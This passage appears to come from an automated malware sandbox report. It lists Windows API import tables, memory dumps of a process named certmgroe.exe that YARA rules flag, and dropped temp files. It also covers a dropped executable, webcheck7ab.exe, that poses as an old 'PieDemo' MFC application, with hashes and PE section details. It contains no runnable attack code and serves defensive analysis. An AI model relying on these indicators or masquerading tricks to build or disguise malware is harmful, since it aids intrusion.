QueryPerformanceCounter 0x0 0x4ad292b0 0x2aaa8 0x290a8 0x3a6
SetUnhandledExceptionFilter 0x0 0x4ad292b8 0x2aab0 0x290b0 0x4af
Sleep 0x0 0x4ad292c0 0x2aab8 0x290b8 0x4bd
DelayLoadFailureHook 0x0 0x4ad292c8 0x2aac0 0x290c0 0xce
LoadLibraryExA 0x0 0x4ad292d0 0x2aac8 0x290c8 0x33f
FreeLibrary 0x0 0x4ad292d8 0x2aad0 0x290d0 0x167
CreateHardLinkW 0x0 0x4ad292e0 0x2aad8 0x290d8 0x93
CreateSymbolicLinkW 0x0 0x4ad292e8 0x2aae0 0x290e0 0xb1
GetVolumePathNameW 0x0 0x4ad292f0 0x2aae8 0x290e8 0x2b2
GetThreadLocale 0x0 0x4ad292f8 0x2aaf0 0x290f0 0x291
ResumeThread 0x0 0x4ad29300 0x2aaf8 0x290f8 0x413
SetProcessAffinityMask 0x0 0x4ad29308 0x2ab00 0x29100 0x487
GetNumaNodeProcessorMaskEx 0x0 0x4ad29310 0x2ab08 0x29108 0x230
GetThreadGroupAffinity 0x0 0x4ad29318 0x2ab10 0x29110 0x28d
FindFirstFileExW 0x0 0x4ad29320 0x2ab18 0x29118 0x139
GetDiskFreeSpaceExW 0x0 0x4ad29328 0x2ab20 0x29120 0x1d4
FindNextStreamW 0x0 0x4ad29330 0x2ab28 0x29128 0x14b
FindFirstStreamW 0x0 0x4ad29338 0x2ab30 0x29130 0x140
DeviceIoControl 0x0 0x4ad29340 0x2ab38 0x29138 0xe0
CompareFileTime 0x0 0x4ad29348 0x2ab40 0x29140 0x60
RemoveDirectoryW 0x0 0x4ad29350 0x2ab48 0x29148 0x403
GetCurrentDirectoryW 0x0 0x4ad29358 0x2ab50 0x29150 0x1c4
GetExitCodeProcess 0x0 0x4ad29360 0x2ab58 0x29158 0x1e5
WaitForSingleObject 0x0 0x4ad29368 0x2ab60 0x29160 0x505
TerminateProcess 0x0 0x4ad29370 0x2ab68 0x29168 0x4cb
SetCurrentDirectoryW 0x0 0x4ad29378 0x2ab70 0x29170 0x458
SetFileTime 0x0 0x4ad29380 0x2ab78 0x29178 0x474
DeleteFileW 0x0 0x4ad29388 0x2ab80 0x29180 0xd6
SetEndOfFile 0x0 0x4ad29390 0x2ab88 0x29188 0x45e
SetFileAttributesW 0x0 0x4ad29398 0x2ab90 0x29190 0x46b
CopyFileW 0x0 0x4ad293a0 0x2ab98 0x29198 0x75
CreateDirectoryW 0x0 0x4ad293a8 0x2aba0 0x291a0 0x81
SetConsoleTextAttribute 0x0 0x4ad293b0 0x2aba8 0x291a8 0x451
FillConsoleOutputAttribute 0x0 0x4ad293b8 0x2abb0 0x291b0 0x12b
ScrollConsoleScreenBufferW 0x0 0x4ad293c0 0x2abb8 0x291b8 0x426
GetACP 0x0 0x4ad293c8 0x2abc0 0x291c0 0x16d
FormatMessageW 0x0 0x4ad293d0 0x2abc8 0x291c8 0x163
FlushFileBuffers 0x0 0x4ad293d8 0x2abd0 0x291d0 0x15c
DuplicateHandle 0x0 0x4ad293e0 0x2abd8 0x291d8 0xeb
HeapSize 0x0 0x4ad293e8 0x2abe0 0x291e0 0x2dc
HeapReAlloc 0x0 0x4ad293f0 0x2abe8 0x291e8 0x2da
VirtualAlloc 0x0 0x4ad293f8 0x2abf0 0x291f0 0x4f5
VirtualFree 0x0 0x4ad29400 0x2abf8 0x291f8 0x4f8
HeapSetInformation 0x0 0x4ad29408 0x2ac00 0x29200 0x2db
GetCurrentThreadId 0x0 0x4ad29410 0x2ac08 0x29208 0x1ca
OpenThread 0x0 0x4ad29418 0x2ac10 0x29210 0x385
GetFileAttributesExW 0x0 0x4ad29420 0x2ac18 0x29218 0x1eb
GetDriveTypeW 0x0 0x4ad29428 0x2ac20 0x29220 0x1d9
GetVersion 0x0 0x4ad29430 0x2ac28 0x29228 0x2a9
LeaveCriticalSection 0x0 0x4ad29438 0x2ac30 0x29230 0x33b
EnterCriticalSection 0x0 0x4ad29440 0x2ac38 0x29238 0xf1
GetModuleFileNameW 0x0 0x4ad29448 0x2ac40 0x29240 0x217
GetWindowsDirectoryW 0x0 0x4ad29450 0x2ac48 0x29248 0x2b6
SetConsoleCtrlHandler 0x0 0x4ad29458 0x2ac50 0x29250 0x438
InitializeCriticalSection 0x0 0x4ad29460 0x2ac58 0x29258 0x2eb
ExpandEnvironmentStringsW 0x0 0x4ad29468 0x2ac60 0x29260 0x122
CancelSynchronousIo 0x0 0x4ad29470 0x2ac68 0x29268 0x44
GetVolumeInformationW 0x0 0x4ad29478 0x2ac70 0x29270 0x2ae
GlobalFree 0x0 0x4ad29480 0x2ac78 0x29278 0x2c2
GlobalAlloc 0x0 0x4ad29488 0x2ac80 0x29280 0x2bb
SetFilePointerEx 0x0 0x4ad29490 0x2ac88 0x29288 0x471
WriteFile 0x0 0x4ad29498 0x2ac90 0x29290 0x531
SearchPathW 0x0 0x4ad294a0 0x2ac98 0x29298 0x428
LocalFree 0x0 0x4ad294a8 0x2aca0 0x292a0 0x34a
SetConsoleTitleW 0x0 0x4ad294b0 0x2aca8 0x292a8 0x453
MoveFileExW 0x0 0x4ad294b8 0x2acb0 0x292b0 0x361
MoveFileW 0x0 0x4ad294c0 0x2acb8 0x292b8 0x364
QueryFullProcessImageNameW 0x0 0x4ad294c8 0x2acc0 0x292c0 0x3a1
ReadProcessMemory 0x0 0x4ad294d0 0x2acc8 0x292c8 0x3c3
LoadLibraryW 0x0 0x4ad294d8 0x2acd0 0x292d0 0x341
RegSetValueExW 0x0 0x4ad294e0 0x2acd8 0x292d8 0x3ec
RegCreateKeyExW 0x0 0x4ad294e8 0x2ace0 0x292e0 0x3c7
UnhandledExceptionFilter 0x0 0x4ad294f0 0x2ace8 0x292e8 0x4df
GetCurrentProcess 0x0 0x4ad294f8 0x2acf0 0x292f0 0x1c5
GetSystemTimeAsFileTime 0x0 0x4ad29500 0x2acf8 0x292f8 0x27e
VirtualQuery 0x0 0x4ad29508 0x2ad00 0x29300 0x4fd
CmdBatNotification 0x0 0x4ad29510 0x2ad08 0x29308 0x5c
GetCPInfo 0x0 0x4ad29518 0x2ad10 0x29310 0x177
GetConsoleOutputCP 0x0 0x4ad29520 0x2ad18 0x29318 0x1b5
SetThreadLocale 0x0 0x4ad29528 0x2ad20 0x29320 0x4a1
GetProcAddress 0x0 0x4ad29530 0x2ad28 0x29328 0x249
GetModuleHandleW 0x0 0x4ad29538 0x2ad30 0x29330 0x21b
CloseHandle 0x0 0x4ad29540 0x2ad38 0x29338 0x52
GetLastError 0x0 0x4ad29548 0x2ad40 0x29340 0x205
SetFilePointer 0x0 0x4ad29550 0x2ad48 0x29348 0x470
GetFullPathNameW 0x0 0x4ad29558 0x2ad50 0x29350 0x1ff
FindFirstFileW 0x0 0x4ad29560 0x2ad58 0x29358 0x13e
FindNextFileW 0x0 0x4ad29568 0x2ad60 0x29360 0x14a
FindClose 0x0 0x4ad29570 0x2ad68 0x29368 0x133
CreateFileW 0x0 0x4ad29578 0x2ad70 0x29370 0x8f
ReadFile 0x0 0x4ad29580 0x2ad78 0x29378 0x3c0
MultiByteToWideChar 0x0 0x4ad29588 0x2ad80 0x29380 0x368
GetFileSize 0x0 0x4ad29590 0x2ad88 0x29388 0x1f4
WideCharToMultiByte 0x0 0x4ad29598 0x2ad90 0x29390 0x51d
lstrcmpiW 0x0 0x4ad295a0 0x2ad98 0x29398 0x555
lstrcmpW 0x0 0x4ad295a8 0x2ada0 0x293a0 0x552
GetStdHandle 0x0 0x4ad295b0 0x2ada8 0x293a8 0x269
FlushConsoleInputBuffer 0x0 0x4ad295b8 0x2adb0 0x293b0 0x15b
HeapAlloc 0x0 0x4ad295c0 0x2adb8 0x293b8 0x2d3
GetProcessHeap 0x0 0x4ad295c8 0x2adc0 0x293c0 0x24e
HeapFree 0x0 0x4ad295d0 0x2adc8 0x293c8 0x2d7
GetConsoleScreenBufferInfo 0x0 0x4ad295d8 0x2add0 0x293d0 0x1b7
ReadConsoleW 0x0 0x4ad295e0 0x2add8 0x293d8 0x3be
SetConsoleCursorPosition 0x0 0x4ad295e8 0x2ade0 0x293e0 0x43c
FillConsoleOutputCharacterW 0x0 0x4ad295f0 0x2ade8 0x293e8 0x12d
WriteConsoleW 0x0 0x4ad295f8 0x2adf0 0x293f0 0x530
GetFileType 0x0 0x4ad29600 0x2adf8 0x293f8 0x1f7
GetUserDefaultLCID 0x0 0x4ad29608 0x2ae00 0x29400 0x2a2
GetLocaleInfoW 0x0 0x4ad29610 0x2ae08 0x29408 0x209
SetLocalTime 0x0 0x4ad29618 0x2ae10 0x29410 0x47f
GetSystemTime 0x0 0x4ad29620 0x2ae18 0x29418 0x27c
SystemTimeToFileTime 0x0 0x4ad29628 0x2ae20 0x29420 0x4c8
FileTimeToLocalFileTime 0x0 0x4ad29630 0x2ae28 0x29428 0x129
FileTimeToSystemTime 0x0 0x4ad29638 0x2ae30 0x29430 0x12a
GetDateFormatW 0x0 0x4ad29640 0x2ae38 0x29438 0x1ce
RegDeleteValueW 0x0 0x4ad29648 0x2ae40 0x29440 0x3cd
GetLocalTime 0x0 0x4ad29650 0x2ae48 0x29448 0x206
GetConsoleMode 0x0 0x4ad29658 0x2ae50 0x29450 0x1b1
SetConsoleMode 0x0 0x4ad29660 0x2ae58 0x29458 0x448
GetEnvironmentVariableW 0x0 0x4ad29668 0x2ae60 0x29460 0x1e2
GetCommandLineW 0x0 0x4ad29670 0x2ae68 0x29468 0x18c
GetNumaHighestNodeNumber 0x0 0x4ad29678 0x2ae70 0x29470 0x22d
GetEnvironmentStringsW 0x0 0x4ad29680 0x2ae78 0x29478 0x1e0
FreeEnvironmentStringsW 0x0 0x4ad29688 0x2ae80 0x29480 0x166
SetEnvironmentVariableW 0x0 0x4ad29690 0x2ae88 0x29488 0x462
SetEnvironmentStringsW 0x0 0x4ad29698 0x2ae90 0x29490 0x460
GetConsoleTitleW 0x0 0x4ad296a0 0x2ae98 0x29498 0x1bb
GetVDMCurrentDirectories 0x0 0x4ad296a8 0x2aea0 0x294a0 0x2a8
SetErrorMode 0x0 0x4ad296b0 0x2aea8 0x294a8 0x463
InitializeProcThreadAttributeList 0x0 0x4ad296b8 0x2aeb0 0x294b0 0x2ee
UpdateProcThreadAttribute 0x0 0x4ad296c0 0x2aeb8 0x294b8 0x4e9
DeleteProcThreadAttributeList 0x0 0x4ad296c8 0x2aec0 0x294c0 0xd7
GetStartupInfoW 0x0 0x4ad296d0 0x2aec8 0x294c8 0x268
CreateProcessW 0x0 0x4ad296d8 0x2aed0 0x294d0 0xa7
GetConsoleWindow 0x0 0x4ad296e0 0x2aed8 0x294d8 0x1bc
GetFileAttributesW 0x0 0x4ad296e8 0x2aee0 0x294e0 0x1ee
NeedCurrentDirectoryForExePathW 0x0 0x4ad296f0 0x2aee8 0x294e8 0x36a
GetBinaryTypeW 0x0 0x4ad296f8 0x2aef0 0x294f0 0x176
RegOpenKeyExW 0x0 0x4ad29700 0x2aef8 0x294f8 0x3e0
RegCloseKey 0x0 0x4ad29708 0x2af00 0x29500 0x3c5
SetLastError 0x0 0x4ad29710 0x2af08 0x29508 0x47c
RegQueryValueExW 0x0 0x4ad29718 0x2af10 0x29510 0x3e5
RegDeleteKeyExW 0x0 0x4ad29720 0x2af18 0x29518 0x3c9
GetCurrentProcessId 0x0 0x4ad29728 0x2af20 0x29520 0x1c6
WINBRAND.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
BrandingFormatString 0x0 0x4ad29738 0x2af30 0x29530 0x0
Memory Dumps (10)
»
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
buffer 22 0x140000000 0x14001CFFF First Execution True 64-bit 0x140003360 False True
certmgroe.exe 22 0x4A2A0000 0x4A2F8FFF Relevant Image True 64-bit - False False
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x1400050FC False True
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x1400065A4 False True
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x1400074B4 False True
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x140008464 False True
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x140009090 False True
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x14000A33C False True
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x1400016C4 False True
buffer 22 0x140000000 0x14001CFFF Content Changed True 64-bit 0x140002E88 False True
c:\users\aetadzjz\appdata\local\temp\~df09c5bfae3de3e75e.tmp Dropped File OLE Compound
Unknown
»
Mime Type application/CDFV2
File Size 20.00 KB
MD5 ee2b50096df103baef42d235a71552b5 Copy to Clipboard
SHA1 4b99e681bb3e51a8afe97fe36606fe18b6f7698f Copy to Clipboard
SHA256 dc75eba4722e7e5b21fd91598de52bd457614f6845c4727b871eaead19626d77 Copy to Clipboard
SSDeep 96:VDmLfmflAVXfJfbw1ra34D9IP+AVwUmimY+xlCmCo/9dpE/3Xpftf1z7:VYwuJR0daIDOP5njmRTCIDW3Xx9p Copy to Clipboard
ImpHash -
c:\users\aetadzjz\appdata\local\temp\~dfa0722f1d650bb1d3.tmp Dropped File OLE Compound
Unknown
»
Mime Type application/CDFV2
File Size 20.00 KB
MD5 1ef6a5ec8d064f1fd22d59446422fef1 Copy to Clipboard
SHA1 4d7365a390994e0eabb2cd8134a955e0eaa087d3 Copy to Clipboard
SHA256 9659737420f0568f8eab3e469a015688d7ca5bb6659aa7dc3ee2e79ae769c1e2 Copy to Clipboard
SSDeep 96:VQxmcQfmflHQTpXfJfbw1ra34D9IP+AVwUmimY+xlCmCo/9dpE/3XnZftf1z7:VrwupR0daIDOP5njmRTCIDW3Xh9p Copy to Clipboard
ImpHash -
c:\users\aetadzjz\appdata\local\temp\~df72c3979dd9ea53e6.tmp Dropped File OLE Compound
Unknown
»
Mime Type application/CDFV2
File Size 20.00 KB
MD5 e2a6e73b2ac509eece2f787768320e5c Copy to Clipboard
SHA1 dacf2bc6bc304c35ff476405963441b5e4b2a1b7 Copy to Clipboard
SHA256 480d0734b7c970839ad21b8414c1c7034ee2c5c1d4969b1642ed09a50ba94cff Copy to Clipboard
SSDeep 96:VcWmjfmflYNXfJfbw1ra34D9IP+AVwUmimY+xlCmCo/9dpE/3Xhftf1z7:VUwGBR0daIDOP5njmRTCIDW3X59p Copy to Clipboard
ImpHash -
C:\Users\aETAdzjz\AppData\Local\msvcr100\\webcheck7ab.exe Dropped File Binary
Unknown
»
Mime Type application/vnd.microsoft.portable-executable
File Size 276.00 KB
MD5 95f991ef95f8bec7c12da41c87df434c Copy to Clipboard
SHA1 d95e83ab66ba3b38e2dd379eee62ab4567a1765c Copy to Clipboard
SHA256 8aee4d46b90f06e10635a7584d506d1dc1cd1b81adb6d7cca04a472af44881bd Copy to Clipboard
SSDeep 6144:59AZ0jbH3bYJfhShfyWkwh9kDBIL8bP2NuQjwUyYjDzFoS:XA+YJENyWe9IL8bPxUyZS Copy to Clipboard
ImpHash fc5819a0898713ca7bcc5c005c85bc2e Copy to Clipboard
PE Information
»
Image Base 0x400000
Entry Point 0x415b01
Size Of Code 0x28000
Size Of Initialized Data 0x1c000
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2020-07-17 15:39:25+00:00
Version Information (9)
»
CompanyName -
FileDescription PieDemo MFC Application
FileVersion 1, 0, 0, 1
InternalName PieDemo
LegalCopyright Copyright (C) 1998
LegalTrademarks -
OriginalFilename PieDemo.EXE
ProductName PieDemo Application
ProductVersion 1, 0, 0, 1
Sections (4)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x275f7 0x28000 0x1000 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.67
.rdata 0x429000 0xbaec 0xc000 0x29000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.01
.data 0x435000 0x5f7c 0x3000 0x35000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 3.31
.rsrc 0x43b000 0xcf10 0xd000 0x38000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 7.1
Imports (7)
»
KERNEL32.dll (107)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RtlUnwind 0x0 0x4290d0 0x33494 0x33494 0x2d7
RaiseException 0x0 0x4290d4 0x33498 0x33498 0x2a7
HeapAlloc 0x0 0x4290d8 0x3349c 0x3349c 0x210
HeapFree 0x0 0x4290dc 0x334a0 0x334a0 0x216
HeapReAlloc 0x0 0x4290e0 0x334a4 0x334a4 0x21a
VirtualAlloc 0x0 0x4290e4 0x334a8 0x334a8 0x381
GetCommandLineA 0x0 0x4290e8 0x334ac 0x334ac 0x110
GetProcessHeap 0x0 0x4290ec 0x334b0 0x334b0 0x1a3
GetStartupInfoA 0x0 0x4290f0 0x334b4 0x334b4 0x1b7
ExitProcess 0x0 0x4290f4 0x334b8 0x334b8 0xb9
HeapSize 0x0 0x4290f8 0x334bc 0x334bc 0x21c
TerminateProcess 0x0 0x4290fc 0x334c0 0x334c0 0x35e
UnhandledExceptionFilter 0x0 0x429100 0x334c4 0x334c4 0x36e
SetUnhandledExceptionFilter 0x0 0x429104 0x334c8 0x334c8 0x34a
IsDebuggerPresent 0x0 0x429108 0x334cc 0x334cc 0x239
Sleep 0x0 0x42910c 0x334d0 0x334d0 0x356
VirtualFree 0x0 0x429110 0x334d4 0x334d4 0x383
HeapDestroy 0x0 0x429114 0x334d8 0x334d8 0x214
HeapCreate 0x0 0x429118 0x334dc 0x334dc 0x212
GetStdHandle 0x0 0x42911c 0x334e0 0x334e0 0x1b9
FreeEnvironmentStringsA 0x0 0x429120 0x334e4 0x334e4 0xf6
GetEnvironmentStrings 0x0 0x429124 0x334e8 0x334e8 0x155
GetEnvironmentStringsW 0x0 0x429128 0x334ec 0x334ec 0x157
SetHandleCount 0x0 0x42912c 0x334f0 0x334f0 0x324
GetFileType 0x0 0x429130 0x334f4 0x334f4 0x166
QueryPerformanceCounter 0x0 0x429134 0x334f8 0x334f8 0x2a3
GetTickCount 0x0 0x429138 0x334fc 0x334fc 0x1df
GetSystemTimeAsFileTime 0x0 0x42913c 0x33500 0x33500 0x1ca
GetACP 0x0 0x429140 0x33504 0x33504 0xfd
GetConsoleCP 0x0 0x429144 0x33508 0x33508 0x122
GetConsoleMode 0x0 0x429148 0x3350c 0x3350c 0x133
LCMapStringA 0x0 0x42914c 0x33510 0x33510 0x244
LCMapStringW 0x0 0x429150 0x33514 0x33514 0x245
GetStringTypeA 0x0 0x429154 0x33518 0x33518 0x1ba
GetStringTypeW 0x0 0x429158 0x3351c 0x3351c 0x1bd
SetStdHandle 0x0 0x42915c 0x33520 0x33520 0x337
WriteConsoleA 0x0 0x429160 0x33524 0x33524 0x399
GetConsoleOutputCP 0x0 0x429164 0x33528 0x33528 0x135
WriteConsoleW 0x0 0x429168 0x3352c 0x3352c 0x3a3
SetErrorMode 0x0 0x42916c 0x33530 0x33530 0x315
CreateFileA 0x0 0x429170 0x33534 0x33534 0x53
FlushFileBuffers 0x0 0x429174 0x33538 0x33538 0xee
SetFilePointer 0x0 0x429178 0x3353c 0x3353c 0x31b
WriteFile 0x0 0x42917c 0x33540 0x33540 0x3a4
ReadFile 0x0 0x429180 0x33544 0x33544 0x2b5
WritePrivateProfileStringA 0x0 0x429184 0x33548 0x33548 0x3a9
GetThreadLocale 0x0 0x429188 0x3354c 0x3354c 0x1da
GetOEMCP 0x0 0x42918c 0x33550 0x33550 0x193
GetCPInfo 0x0 0x429190 0x33554 0x33554 0x104
GlobalFlags 0x0 0x429194 0x33558 0x33558 0x1fe
TlsFree 0x0 0x429198 0x3355c 0x3355c 0x364
DeleteCriticalSection 0x0 0x42919c 0x33560 0x33560 0x81
LocalReAlloc 0x0 0x4291a0 0x33564 0x33564 0x25f
TlsSetValue 0x0 0x4291a4 0x33568 0x33568 0x366
TlsAlloc 0x0 0x4291a8 0x3356c 0x3356c 0x363
InitializeCriticalSection 0x0 0x4291ac 0x33570 0x33570 0x223
GlobalHandle 0x0 0x4291b0 0x33574 0x33574 0x202
GlobalReAlloc 0x0 0x4291b4 0x33578 0x33578 0x206
EnterCriticalSection 0x0 0x4291b8 0x3357c 0x3357c 0x98
TlsGetValue 0x0 0x4291bc 0x33580 0x33580 0x365
LeaveCriticalSection 0x0 0x4291c0 0x33584 0x33584 0x251
LocalAlloc 0x0 0x4291c4 0x33588 0x33588 0x258
InterlockedIncrement 0x0 0x4291c8 0x3358c 0x3358c 0x22c
GetCurrentProcessId 0x0 0x4291cc 0x33590 0x33590 0x143
CloseHandle 0x0 0x4291d0 0x33594 0x33594 0x34
GetCurrentThread 0x0 0x4291d4 0x33598 0x33598 0x145
ConvertDefaultLocale 0x0 0x4291d8 0x3359c 0x3359c 0x3f
GetModuleFileNameA 0x0 0x4291dc 0x335a0 0x335a0 0x17d
EnumResourceLanguagesA 0x0 0x4291e0 0x335a4 0x335a4 0xa3
GetLocaleInfoA 0x0 0x4291e4 0x335a8 0x335a8 0x174
lstrcmpA 0x0 0x4291e8 0x335ac 0x335ac 0x3c0
InterlockedDecrement 0x0 0x4291ec 0x335b0 0x335b0 0x228
GetModuleFileNameW 0x0 0x4291f0 0x335b4 0x335b4 0x17e
FreeResource 0x0 0x4291f4 0x335b8 0x335b8 0xfa
GetCurrentThreadId 0x0 0x4291f8 0x335bc 0x335bc 0x146
GlobalGetAtomNameA 0x0 0x4291fc 0x335c0 0x335c0 0x200
GlobalAddAtomA 0x0 0x429200 0x335c4 0x335c4 0x1f6
GlobalFindAtomA 0x0 0x429204 0x335c8 0x335c8 0x1fb
GlobalDeleteAtom 0x0 0x429208 0x335cc 0x335cc 0x1fa
FreeLibrary 0x0 0x42920c 0x335d0 0x335d0 0xf8
LoadLibraryA 0x0 0x429210 0x335d4 0x335d4 0x252
lstrcmpW 0x0 0x429214 0x335d8 0x335d8 0x3c1
GetVersionExA 0x0 0x429218 0x335dc 0x335dc 0x1e9
GetModuleHandleA 0x0 0x42921c 0x335e0 0x335e0 0x17f
SetLastError 0x0 0x429220 0x335e4 0x335e4 0x328
GlobalFree 0x0 0x429224 0x335e8 0x335e8 0x1ff
GlobalAlloc 0x0 0x429228 0x335ec 0x335ec 0x1f8
GlobalLock 0x0 0x42922c 0x335f0 0x335f0 0x203
GlobalUnlock 0x0 0x429230 0x335f4 0x335f4 0x20a
FormatMessageA 0x0 0x429234 0x335f8 0x335f8 0xf3
LocalFree 0x0 0x429238 0x335fc 0x335fc 0x25c
MulDiv 0x0 0x42923c 0x33600 0x33600 0x274
lstrlenA 0x0 0x429240 0x33604 0x33604 0x3cc
CompareStringA 0x0 0x429244 0x33608 0x33608 0x3a
GetVersion 0x0 0x429248 0x3360c 0x3360c 0x1e8
GetLastError 0x0 0x42924c 0x33610 0x33610 0x171
MultiByteToWideChar 0x0 0x429250 0x33614 0x33614 0x275
InterlockedExchange 0x0 0x429254 0x33618 0x33618 0x229
LoadLibraryExA 0x0 0x429258 0x3361c 0x3361c 0x253
GetProcAddress 0x0 0x42925c 0x33620 0x33620 0x1a0
GetCurrentProcess 0x0 0x429260 0x33624 0x33624 0x142
WideCharToMultiByte 0x0 0x429264 0x33628 0x33628 0x394
FindResourceA 0x0 0x429268 0x3362c 0x3362c 0xe3
LoadResource 0x0 0x42926c 0x33630 0x33630 0x257
LockResource 0x0 0x429270 0x33634 0x33634 0x265
FreeEnvironmentStringsW 0x0 0x429274 0x33638 0x33638 0xf7
SizeofResource 0x0 0x429278 0x3363c 0x3363c 0x355
USER32.dll (116)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetMessageA 0x0 0x42929c 0x33660 0x33660 0x13a
TranslateMessage 0x0 0x4292a0 0x33664 0x33664 0x2aa
ValidateRect 0x0 0x4292a4 0x33668 0x33668 0x2c4
PostQuitMessage 0x0 0x4292a8 0x3366c 0x3366c 0x204
GetCursorPos 0x0 0x4292ac 0x33670 0x33670 0x10b
WindowFromPoint 0x0 0x4292b0 0x33674 0x33674 0x2d4
GetDesktopWindow 0x0 0x4292b4 0x33678 0x33678 0x10e
GetActiveWindow 0x0 0x4292b8 0x3367c 0x3367c 0xeb
CreateDialogIndirectParamA 0x0 0x4292bc 0x33680 0x33680 0x52
GetNextDlgTabItem 0x0 0x4292c0 0x33684 0x33684 0x143
EndDialog 0x0 0x4292c4 0x33688 0x33688 0xc6
IsWindowEnabled 0x0 0x4292c8 0x3368c 0x3368c 0x1ae
ShowWindow 0x0 0x4292cc 0x33690 0x33690 0x292
MoveWindow 0x0 0x4292d0 0x33694 0x33694 0x1ec
SetWindowTextA 0x0 0x4292d4 0x33698 0x33698 0x286
IsDialogMessageA 0x0 0x4292d8 0x3369c 0x3369c 0x1a1
SetMenuItemBitmaps 0x0 0x4292dc 0x336a0 0x336a0 0x261
GetMenuCheckMarkDimensions 0x0 0x4292e0 0x336a4 0x336a4 0x12e
LoadBitmapA 0x0 0x4292e4 0x336a8 0x336a8 0x1b8
ModifyMenuA 0x0 0x4292e8 0x336ac 0x336ac 0x1e7
EnableMenuItem 0x0 0x4292ec 0x336b0 0x336b0 0xc2
CheckMenuItem 0x0 0x4292f0 0x336b4 0x336b4 0x39
RegisterWindowMessageA 0x0 0x4292f4 0x336b8 0x336b8 0x227
SendDlgItemMessageA 0x0 0x4292f8 0x336bc 0x336bc 0x236
WinHelpA 0x0 0x4292fc 0x336c0 0x336c0 0x2d1
GetCapture 0x0 0x429300 0x336c4 0x336c4 0xf3
SetWindowsHookExA 0x0 0x429304 0x336c8 0x336c8 0x28a
CallNextHookEx 0x0 0x429308 0x336cc 0x336cc 0x1a
GetClassLongA 0x0 0x42930c 0x336d0 0x336d0 0xfa
GetClassNameA 0x0 0x429310 0x336d4 0x336d4 0xfc
SetPropA 0x0 0x429314 0x336d8 0x336d8 0x26a
GetPropA 0x0 0x429318 0x336dc 0x336dc 0x14a
RemovePropA 0x0 0x42931c 0x336e0 0x336e0 0x22c
GetFocus 0x0 0x429320 0x336e4 0x336e4 0x116
SetFocus 0x0 0x429324 0x336e8 0x336e8 0x256
GetWindowTextLengthA 0x0 0x429328 0x336ec 0x336ec 0x178
GetWindowTextA 0x0 0x42932c 0x336f0 0x336f0 0x177
GetLastActivePopup 0x0 0x429330 0x336f4 0x336f4 0x128
SetActiveWindow 0x0 0x429334 0x336f8 0x336f8 0x243
GetDlgItem 0x0 0x429338 0x336fc 0x336fc 0x111
GetTopWindow 0x0 0x42933c 0x33700 0x33700 0x163
DestroyWindow 0x0 0x429340 0x33704 0x33704 0x99
UnhookWindowsHookEx 0x0 0x429344 0x33708 0x33708 0x2ae
GetMessageTime 0x0 0x429348 0x3370c 0x3370c 0x13d
PeekMessageA 0x0 0x42934c 0x33710 0x33710 0x200
MapWindowPoints 0x0 0x429350 0x33714 0x33714 0x1da
GetKeyState 0x0 0x429354 0x33718 0x33718 0x121
SetForegroundWindow 0x0 0x429358 0x3371c 0x3371c 0x257
IsWindowVisible 0x0 0x42935c 0x33720 0x33720 0x1b1
UpdateWindow 0x0 0x429360 0x33724 0x33724 0x2bc
GetMenu 0x0 0x429364 0x33728 0x33728 0x12c
PostMessageA 0x0 0x429368 0x3372c 0x3372c 0x202
MessageBoxA 0x0 0x42936c 0x33730 0x33730 0x1df
CreateWindowExA 0x0 0x429370 0x33734 0x33734 0x60
GetClassInfoExA 0x0 0x429374 0x33738 0x33738 0xf7
GetClassInfoA 0x0 0x429378 0x3373c 0x3373c 0xf6
AdjustWindowRectEx 0x0 0x42937c 0x33740 0x33740 0x2
GetDlgCtrlID 0x0 0x429380 0x33744 0x33744 0x110
CallWindowProcA 0x0 0x429384 0x33748 0x33748 0x1b
GetWindowLongA 0x0 0x429388 0x3374c 0x3374c 0x16e
SetWindowLongA 0x0 0x42938c 0x33750 0x33750 0x280
SetWindowPos 0x0 0x429390 0x33754 0x33754 0x283
GetWindowPlacement 0x0 0x429394 0x33758 0x33758 0x173
GetWindow 0x0 0x429398 0x3375c 0x3375c 0x16a
EndPaint 0x0 0x42939c 0x33760 0x33760 0xc8
BeginPaint 0x0 0x4293a0 0x33764 0x33764 0xd
ReleaseDC 0x0 0x4293a4 0x33768 0x33768 0x22a
CopyRect 0x0 0x4293a8 0x3376c 0x3376c 0x4a
SetRect 0x0 0x4293ac 0x33770 0x33770 0x26c
InflateRect 0x0 0x4293b0 0x33774 0x33774 0x18a
OffsetRect 0x0 0x4293b4 0x33778 0x33778 0x1f5
DrawEdge 0x0 0x4293b8 0x3377c 0x3377c 0xb2
DrawFrameControl 0x0 0x4293bc 0x33780 0x33780 0xb5
GetDC 0x0 0x4293c0 0x33784 0x33784 0x10c
ClientToScreen 0x0 0x4293c4 0x33788 0x33788 0x40
ScreenToClient 0x0 0x4293c8 0x3378c 0x3378c 0x231
GrayStringA 0x0 0x4293cc 0x33790 0x33790 0x17d
DrawTextExA 0x0 0x4293d0 0x33794 0x33794 0xbd
DrawTextA 0x0 0x4293d4 0x33798 0x33798 0xbc
TabbedTextOutA 0x0 0x4293d8 0x3379c 0x3379c 0x29b
GetMenuState 0x0 0x4293dc 0x337a0 0x337a0 0x137
GetMenuItemID 0x0 0x4293e0 0x337a4 0x337a4 0x133
GetMenuItemCount 0x0 0x4293e4 0x337a8 0x337a8 0x132
UnregisterClassA 0x0 0x4293e8 0x337ac 0x337ac 0x2b3
